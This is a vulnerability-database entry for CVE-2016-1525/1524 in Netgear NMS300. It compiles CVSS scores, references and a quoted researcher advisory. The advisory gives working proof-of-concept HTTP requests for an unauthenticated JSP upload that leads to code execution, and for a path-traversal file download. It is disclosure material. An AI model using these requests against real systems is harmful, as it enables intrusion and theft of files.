Details of VAR-201602-0193

ID

VAR-201602-0193

CVE

CVE-2016-1525

TITLE

Netgear Management System NMS300 Directory Traversal Vulnerability

Trust: 1.2

sources: CNVD: CNVD-2016-00973 // CNNVD: CNNVD-201602-130

DESCRIPTION

Directory traversal vulnerability in data/config/image.do in NETGEAR Management System NMS300 1.5.0.11 and earlier allows remote authenticated users to read arbitrary files via a .. (dot dot) in the realName parameter. The NetgearManagementSystem NMS300 is a network management system for diagnosing, controlling and optimizing network devices. Netgear Management System NMS300 is prone to a directory-traversal vulnerability and and multiple arbitrary file-upload vulnerabilities. Other attacks are also possible. Netgear Management System NMS300 1.5.0.11 and prior are vulnerable. >> Remote code execution / arbitrary file download in NETGEAR ProSafe Network Management System NMS300 >> Discovered by Pedro Ribeiro (pedrib@gmail.com), Agile Information Security (http://www.agileinfosec.co.uk/) ========================================================================== Disclosure: 04/02/2016 / Last updated: 04/02/2016 >> Background on the affected product: "NMS300 ProSAFE® Network Management System Diagnose, control, and optimize your network devices. An intuitive, web-based user interface makes it easier to monitor and administer an entire network." >> Summary: Netgear's NMS300 is a network management utility that runs on Windows systems. It has serious two vulnerabilities that can be exploited by a remote attacker. A special thanks to Joel Land of CERT/CC for helping disclose this vulnerability under ID 777024 [1]. Two new Metasploit modules that exploit these vulnerabilities have been released. >> Technical details: #1 Vulnerability: Remote code execution via arbitrary file upload (unauthenticated) CVE-2016-1525 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 There are two servlets that allow unauthenticated file uploads: @RequestMapping({ "/fileUpload.do" }) public class FileUpload2Controller - Uses spring file upload @RequestMapping({ "/lib-1.0/external/flash/fileUpload.do" }) public class FileUploadController - Uses flash upload The JSP file can be uploaded as shown below, it will be named null[name].[extension] and can be reached on http://[host]:8080/null[name].[extension]. So for example if [name] = "testing" and [extension] = ".jsp", the final file will be named "nulltesting.jsp". [name] and [extension] can be seen in the sample request below. The code will execute as the SYSTEM user. POST /lib-1.0/external/flash/fileUpload.do HTTP/1.1 Content-Type: multipart/form-data; boundary=----------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="name" [name] ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3 Content-Disposition: form-data; name="Filedata"; filename="whatever.[extension]" Content-Type: application/octet-stream <%@ page language="java" contentType="text/html; charset=ISO-8859-1" pageEncoding="ISO-8859-1"%> <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html> <head> <meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"> <title>Hello World Example</title> </head> <body> <h2>A Hello World Example of JSP.</h2> </body> </html> ------------ae0KM7Ef1ei4GI3gL6gL6gL6gL6GI3-- #2 Vulnerability: Arbitrary file download (authenticated) CVE-2016-1524 Affected versions: NMS300 1.5.0.11 NMS300 1.5.0.2 NMS300 1.4.0.17 NMS300 1.1.0.13 Three steps need to be taken in order to exploit this vulnerability: a) Add a configuration image, with the realName parameter containing the path traversal to the target file: POST /data/config/image.do?method=add HTTP/1.1 realName=../../../../../../../../../../<file on C:\>&md5=&fileName=<imagename.img>&version=1337&vendor=Netgear&deviceType=4&deviceModel=FS526Tv2&description=bla b) Obtain the file identifier (imageId) for the image that was created by scraping the page below for "imagename.img" (the fileName parameter in step 1): POST /data/getPage.do?method=getPageList&type=configImgManager everyPage=10000 Sample response: {"page":{"beginIndex":0,"recordCount":7,"totalRecords":7,"currentPage":1,"everyPage":10,"totalPage":1},"list":[{"imageId":"1","fileName":"agga5.img","createTime":"10/03/2015 21:12:36","realFileName":"../../../../../../../../../../log.txt","vendor":"Netgear","deviceType":"4","deviceModel":"FS526Tv2","version":"2323","sizeM":"24491","createBy":"admin","createId":"1","description":"bla\r\n"} c) Download the file with the imageId obtained in step 2: GET /data/config/image.do?method=export&imageId=<ID> >> Fix: No fix is currently available. It is recommended not to expose NMS300 to the Internet or any unstrusted networks. >> References: [1] https://www.kb.cert.org/vuls/id/777024 ================ Agile Information Security Limited http://www.agileinfosec.co.uk/ >> Enabling secure digital business >>

Trust: 3.33

sources: NVD: CVE-2016-1525 // CERT/CC: VU#777024 // JVNDB: JVNDB-2016-001517 // CNVD: CNVD-2016-00973 // BID: 82630 // VULHUB: VHN-90344 // PACKETSTORM: 135618

IOT TAXONOMY

category:

['Network device']

sub_category:

Trust: 0.6

sources: CNVD: CNVD-2016-00973

AFFECTED PRODUCTS

vendor:	netgear	model:	prosafe network management software 300	scope:	eq	version:	1.5.0.11	Trust: 1.6
vendor:	netgear	model:	-	scope:	-	version:	-	Trust: 0.8
vendor:	net gear	model:	prosafe network management system nms300	scope:	lte	version:	1.5.0.11	Trust: 0.8
vendor:	netgear	model:	management system nms300	scope:	lte	version:	<=1.5.0.11	Trust: 0.6

sources: CERT/CC: VU#777024 // CNVD: CNVD-2016-00973 // JVNDB: JVNDB-2016-001517 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

CVSS

SEVERITY

CVSSV2

CVSSV3

nvd@nist.gov:	CVE-2016-1525
value:	HIGH
Trust: 1.0
NVD:	CVE-2016-1525
value:	HIGH
Trust: 0.8
CNVD:	CNVD-2016-00973
value:	HIGH
Trust: 0.6
CNNVD:	CNNVD-201602-130
value:	HIGH
Trust: 0.6
VULHUB:	VHN-90344
value:	HIGH
Trust: 0.1

nvd@nist.gov:	CVE-2016-1525
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 1.8
CNVD:	CNVD-2016-00973
severity:	HIGH
baseScore:	8.3
vectorString:	AV:A/AC:L/AU:N/C:C/I:C/A:C
accessVector:	ADJACENT_NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	COMPLETE
availabilityImpact:	COMPLETE
exploitabilityScore:	6.5
impactScore:	10.0
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.6
VULHUB:	VHN-90344
severity:	HIGH
baseScore:	7.8
vectorString:	AV:N/AC:L/AU:N/C:C/I:N/A:N
accessVector:	NETWORK
accessComplexity:	LOW
authentication:	NONE
confidentialityImpact:	COMPLETE
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	10.0
impactScore:	6.9
acInsufInfo:	NONE
obtainAllPrivilege:	NONE
obtainUserPrivilege:	NONE
obtainOtherPrivilege:	NONE
userInteractionRequired:	NONE
version:	2.0
Trust: 0.1

nvd@nist.gov:	CVE-2016-1525
baseSeverity:	HIGH
baseScore:	8.6
vectorString:	CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
attackVector:	NETWORK
attackComplexity:	LOW
privilegesRequired:	NONE
userInteraction:	NONE
scope:	CHANGED
confidentialityImpact:	HIGH
integrityImpact:	NONE
availabilityImpact:	NONE
exploitabilityScore:	3.9
impactScore:	4.0
version:	3.0
Trust: 1.0

sources: CNVD: CNVD-2016-00973 // VULHUB: VHN-90344 // JVNDB: JVNDB-2016-001517 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

PROBLEMTYPE DATA

problemtype:

CWE-22

Trust: 1.9

sources: VULHUB: VHN-90344 // JVNDB: JVNDB-2016-001517 // NVD: CVE-2016-1525

THREAT TYPE

remote

Trust: 0.6

sources: CNNVD: CNNVD-201602-130

TYPE

path traversal

Trust: 0.6

sources: CNNVD: CNNVD-201602-130

CONFIGURATIONS

sources: JVNDB: JVNDB-2016-001517

EXPLOIT AVAILABILITY

sources: VULHUB: VHN-90344

PATCH

title:	NETGEAR Download Center - NMS300	url:	http://downloadcenter.netgear.com/en/product/NMS300#searchResults	Trust: 0.8
title:	NetgearManagementSystemNMS300 directory traversal vulnerability patch	url:	https://www.cnvd.org.cn/patchInfo/show/71361	Trust: 0.6

sources: CNVD: CNVD-2016-00973 // JVNDB: JVNDB-2016-001517

EXTERNAL IDS

db:	CERT/CC	id:	VU#777024	Trust: 4.3
db:	NVD	id:	CVE-2016-1525	Trust: 3.5
db:	PACKETSTORM	id:	135618	Trust: 1.2
db:	PACKETSTORM	id:	135999	Trust: 1.1
db:	EXPLOIT-DB	id:	39515	Trust: 1.1
db:	EXPLOIT-DB	id:	39412	Trust: 1.1
db:	JVN	id:	JVNVU96743693	Trust: 0.8
db:	JVNDB	id:	JVNDB-2016-001517	Trust: 0.8
db:	CNNVD	id:	CNNVD-201602-130	Trust: 0.7
db:	CNVD	id:	CNVD-2016-00973	Trust: 0.6
db:	BID	id:	82630	Trust: 0.3
db:	VULHUB	id:	VHN-90344	Trust: 0.1

sources: CERT/CC: VU#777024 // CNVD: CNVD-2016-00973 // VULHUB: VHN-90344 // BID: 82630 // JVNDB: JVNDB-2016-001517 // PACKETSTORM: 135618 // CNNVD: CNNVD-201602-130 // NVD: CVE-2016-1525

REFERENCES

url:	http://www.kb.cert.org/vuls/id/777024	Trust: 3.5
url:	http://seclists.org/fulldisclosure/2016/feb/30	Trust: 3.3
url:	http://downloadcenter.netgear.com/en/product/nms300#	Trust: 1.7
url:	http://www.securityfocus.com/archive/1/537446/100/0/threaded	Trust: 1.1
url:	https://www.exploit-db.com/exploits/39412/	Trust: 1.1
url:	https://www.exploit-db.com/exploits/39515/	Trust: 1.1
url:	http://packetstormsecurity.com/files/135618/netgear-pro-nms-300-code-execution-file-download.html	Trust: 1.1
url:	http://packetstormsecurity.com/files/135999/netgear-prosafe-network-management-system-300-arbitrary-file-upload.html	Trust: 1.1
url:	http://www.rapid7.com/db/modules/exploit/windows/http/netgear_nms_rce	Trust: 1.1
url:	https://cwe.mitre.org/data/definitions/434.html	Trust: 0.8
url:	https://cwe.mitre.org/data/definitions/22.html	Trust: 0.8
url:	http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1525	Trust: 0.8
url:	http://jvn.jp/vu/jvnvu96743693/	Trust: 0.8
url:	http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1525	Trust: 0.8
url:	http://www.netgear.com	Trust: 0.3
url:	https://nvd.nist.gov/vuln/detail/cve-2016-1525	Trust: 0.1
url:	http://[host]:8080/null[name].[extension].	Trust: 0.1
url:	http://www.w3.org/tr/html4/loose.dtd">	Trust: 0.1
url:	https://nvd.nist.gov/vuln/detail/cve-2016-1524	Trust: 0.1
url:	http://www.agileinfosec.co.uk/)	Trust: 0.1
url:	http://www.agileinfosec.co.uk/	Trust: 0.1

CREDITS

Pedro Ribeiro of Agile Information Security.

Trust: 0.3

sources: BID: 82630

SOURCES

db:	CERT/CC	id:	VU#777024
db:	CNVD	id:	CNVD-2016-00973
db:	VULHUB	id:	VHN-90344
db:	BID	id:	82630
db:	JVNDB	id:	JVNDB-2016-001517
db:	PACKETSTORM	id:	135618
db:	CNNVD	id:	CNNVD-201602-130
db:	NVD	id:	CVE-2016-1525

LAST UPDATE DATE

2024-11-23T22:52:41.660000+00:00

SOURCES UPDATE DATE

db:	CERT/CC	id:	VU#777024	date:	2016-02-04T00:00:00
db:	CNVD	id:	CNVD-2016-00973	date:	2016-02-16T00:00:00
db:	VULHUB	id:	VHN-90344	date:	2018-10-09T00:00:00
db:	BID	id:	82630	date:	2016-07-05T21:22:00
db:	JVNDB	id:	JVNDB-2016-001517	date:	2016-02-29T00:00:00
db:	CNNVD	id:	CNNVD-201602-130	date:	2016-03-01T00:00:00
db:	NVD	id:	CVE-2016-1525	date:	2024-11-21T02:46:36.153

SOURCES RELEASE DATE

db:	CERT/CC	id:	VU#777024	date:	2016-02-03T00:00:00
db:	CNVD	id:	CNVD-2016-00973	date:	2016-02-16T00:00:00
db:	VULHUB	id:	VHN-90344	date:	2016-02-13T00:00:00
db:	BID	id:	82630	date:	2016-02-03T00:00:00
db:	JVNDB	id:	JVNDB-2016-001517	date:	2016-02-29T00:00:00
db:	PACKETSTORM	id:	135618	date:	2016-02-07T17:10:18
db:	CNNVD	id:	CNNVD-201602-130	date:	2016-02-04T00:00:00
db:	NVD	id:	CVE-2016-1525	date:	2016-02-13T02:59:10.900